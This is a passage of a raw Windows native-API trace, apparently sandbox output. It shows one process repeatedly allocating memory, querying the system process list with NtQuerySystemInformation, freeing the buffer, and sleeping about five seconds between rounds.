returned 0x0 [0222.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.962] NtQuerySystemInformation (in: 